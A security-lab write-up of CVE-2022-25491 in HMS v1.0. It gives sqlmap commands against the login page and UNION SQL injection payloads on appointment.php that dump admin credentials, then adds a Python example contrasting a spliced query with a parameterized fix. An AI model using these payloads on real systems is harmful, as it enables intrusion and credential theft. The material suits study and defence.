CVE-2022-25491
Affected version: HMS v1.0
Description: HMS v1.0 was found to contain SQL injection vulnerabilities via adminlogin.php and Patientlogin.php
Attack approach
Injection point (1):
- Capture the request on the login page
![Figure 1 - [Beginner] HMS v1.0 SQL injection - NGC660 Security Lab](http://ngc660.cn/wp-content/uploads/2022/08/d2b5ca33bd091116.png)
- Note the loginid parameter: this is the injection point
- Run sqlmap directly. This is a POST injection, so save the captured request to a txt file first
sqlmap -r 1.txt -p loginid
-> -p specifies the parameter to test
![Figure 2 - [Beginner] HMS v1.0 SQL injection - NGC660 Security Lab](http://ngc660.cn/wp-content/uploads/2022/08/d2b5ca33bd091140.png)
--dbs
![Figure 3 - [Beginner] HMS v1.0 SQL injection - NGC660 Security Lab](http://ngc660.cn/wp-content/uploads/2022/08/d2b5ca33bd091153.png)
-D hms --tables
![Figure 4 - [Beginner] HMS v1.0 SQL injection - NGC660 Security Lab](http://ngc660.cn/wp-content/uploads/2022/08/d2b5ca33bd091204.png)
Injection point (2):
/appointment.php?editid=-1%27union%20select%201,2,3,4,5,6,7,8,9,10 %23
-> column 10 is the echo point
![Figure 5 - [Beginner] HMS v1.0 SQL injection - NGC660 Security Lab](http://ngc660.cn/wp-content/uploads/2022/08/d2b5ca33bd091218-1024x520.png)
/appointment.php?editid=-1'union%20select 1,2,3,4,5,6,7,8,9,database() %23
-> show the current database
![Figure 6 - [Beginner] HMS v1.0 SQL injection - NGC660 Security Lab](http://ngc660.cn/wp-content/uploads/2022/08/d2b5ca33bd091230-1-1024x445.png)
/appointment.php?editid=-1'union%20select 1,2,3,4,5,6,7,8,9,(select group_concat(table_name) from information_schema.tables where%20table_schema=database()) %23
-> list all tables
/appointment.php?editid=-1'union%20select 1,2,3,4,5,6,7,8,9,(select group_concat(column_name) from information_schema.columns where%20table_schema=database() and table_name='admin') %23
-> list the columns of the admin table in the current database
/appointment.php?editid=-1' union select 1,2,3,4,5,6,7,8,9,(select group_concat(username,password) from admin) %23
-> dump the data in the admin table. There are too many tables, so it is not clear which one holds the flag.
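The editid injection works because the parameter is spliced straight into the SQL text, so the closing quote plus a UNION turns the rest of the value into a second query. The following Python/sqlite3 snippet is an added example, not code from the original post or from HMS: it rebuilds that pattern against a constructed 10-column appointment table, shows the page's UNION probe landing in column 10, and puts the parameterized lookup beside it to show the same payload being treated as a plain value. The schema and the admin credentials are constructed; SQLite's `-- ` comment and `||` concatenation stand in for MySQL's `#` and two-argument group_concat, and SQLite has no information_schema, so the subquery reads the constructed admin table directly.

```python
import sqlite3
from urllib.parse import unquote

# Constructed stand-in for HMS: a 10-column appointment table so the page's
# "1,2,...,10" UNION probe lines up, plus an admin table with made-up data.
SCHEMA = """
CREATE TABLE appointment (
    id INTEGER PRIMARY KEY, patient TEXT, doctor TEXT, appt_date TEXT,
    appt_time TEXT, status TEXT, fee INTEGER, notes TEXT, created TEXT, updated TEXT
);
INSERT INTO appointment VALUES
    (1, 'alice', 'dr_bob', '2022-08-01', '09:00', 'open', 50, '', '2022-07-30', '2022-07-30');
CREATE TABLE admin (username TEXT, password TEXT);
INSERT INTO admin VALUES ('admin', 'constructed-hash');
"""

# The page's payload shape, URL-encoded as it arrives in editid. SQLite has no
# '#' comment and no information_schema, so the tail is '-- ' and the subquery
# reads the constructed admin table (MySQL would be group_concat(username,password)).
PAYLOAD = ("-1%27union%20select%201,2,3,4,5,6,7,8,9,"
           "(select%20group_concat(username||':'||password)%20from%20admin)%20--%20")


def _db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    return con


def edit_appointment_vulnerable(editid: str) -> list:
    """String-spliced query: whatever follows the closing quote becomes SQL."""
    sql = f"SELECT * FROM appointment WHERE id='{unquote(editid)}'"
    return _db().execute(sql).fetchall()


def edit_appointment_fixed(editid: str) -> list:
    """Bound parameter: the driver sends the input as a value, never as SQL text."""
    return _db().execute(
        "SELECT * FROM appointment WHERE id=?", (unquote(editid),)
    ).fetchall()


if __name__ == "__main__":
    # Column 10 (index 9) of the UNION row carries the admin table contents.
    print(edit_appointment_vulnerable(PAYLOAD)[0][9])
    # Bound as a parameter, the same payload is just an id that matches nothing.
    print(edit_appointment_fixed(PAYLOAD))
```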